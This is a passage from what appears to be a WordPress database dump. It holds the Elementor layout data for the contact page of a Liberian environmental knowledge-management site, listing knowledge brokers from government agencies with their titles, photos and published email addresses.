"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine A\'jami<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(38585,76,'_elementor_css','a:6:{s:4:\"time\";i:1770854587;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(34895,5099,'_elementor_pro_version','3.7.1'),(34896,5100,'_elementor_edit_mode','builder'),(34897,5100,'_elementor_template_type','wp-page'),(34898,5100,'_elementor_version','3.6.6'),(34899,5100,'_wp_page_template','default'),(34900,5100,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\